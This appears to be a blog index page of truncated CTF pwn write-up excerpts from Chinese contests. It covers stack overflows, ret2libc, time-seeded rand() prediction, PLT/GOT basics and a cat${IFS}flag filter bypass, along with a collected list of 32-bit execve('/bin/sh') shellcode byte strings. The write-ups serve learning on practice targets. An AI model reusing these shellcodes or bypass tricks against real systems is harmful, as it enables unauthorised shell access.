Star

...

PWN前面的几道题是基础的题目，就不再赘述了 boom/boom_revengefrom pwn...

hello_pwn直接nc连接得flag，没什么说的。 haoo@haoo:~/Desktop$ nc node6.anna.nssctf.cn 24590Welcome, ctfer, to NSSCTF 2025. We wish you a great time!A journey of a thousand miles begins with a single step.Go ahead and grab your first flag now!lsbinbugdevflagliblib32lib64libexeclibx32cat flagNSSCTF{e6f6b5fd-968d-4425-ac40-23a58494102f} 他得不到她简单的栈溢出，存在后门函数，只是将system(‘/bin/sh’)换成了system(‘$0’)。 from pwn...

Week1幸运星 一道伪随机数的题目，只需要50次输入和生产的随机数一样即可，此题将time(0)设置为种子，这里我还是编写一段C语言代码来生产随机数。 #include<stdio.h>#include<stdlib.h>#include<time.h>int main(){ srand(time(0)); int x=0; for(int i=0;i<50;i++) { x=rand()%53+7; printf("%d\n",x); } return 0;} from pwn...

Week1第一周的题都比较简单，就想说一下GNU那道比较新颖，挺好玩的。 GNU...

该文章主要借鉴了yichen师傅的博客，加上自己的一些实操与理解。主要是为了更好理解一些原理。 Linux动态链接PLT与GOT在Linux中，动态链接主要通过PLT与GOT来实现的。实验以下源代码来理解一下 #include <stdio.h>void print_banner(){ printf("Welcome to World of PLT and GOT\n");}int main(void){ print_banner(); return 0;} 使用gcc -o test test.o -m32与gcc -Wall -g -o test.o -c test.c -m32进行编译，可以同时获得一个.o文件与可执行文件，接着使用objdump看一下反汇编 test.o: file format elf32-i386Disassembly of section .text:00000000 <print_banner>: 0: 55 ...

做了一些shellcode的题目了，遇到了多种多样的shellcode，在这里记录一些，方便以后直接使用。（当然能够自己编写更好） 32位shellcraft生成的shellcodeshellcraft.sh()b'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'#长度：44 能直接获取shell 其他shellcode21bytesb"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" ...

hello_world(签到) 开启了pie保护，但是可以泄漏地址，而且存在栈溢出，因此可以先泄漏libc，再打ret2libc。 from pwn import*libc=ELF('./hello_worldlibc.so.6')elf=ELF('./hello_world')io=remote('challenge.imxbt.cn',30092)payload=b'a'*0x28io.recvuntil(b'name:...

nc 这题主要是通过nc连接后，输入相应的指令获得flag，因此可以不用关心开启的保护机制。 程序先判断用户输入的是否是$0，若为$0则进入special-mode，再看parse_special_command函数，不能使用cat flag指令获取flag，但可以使用cat${IFS}flag获取flag。 from pwn import*io=remote('1.95.36.136',2066)io.sendline(b'$0')io.sendline(b'cat${IFS}flag')io.interactive() stackof 存在后门函数，只需要n49等于1。 from pwn...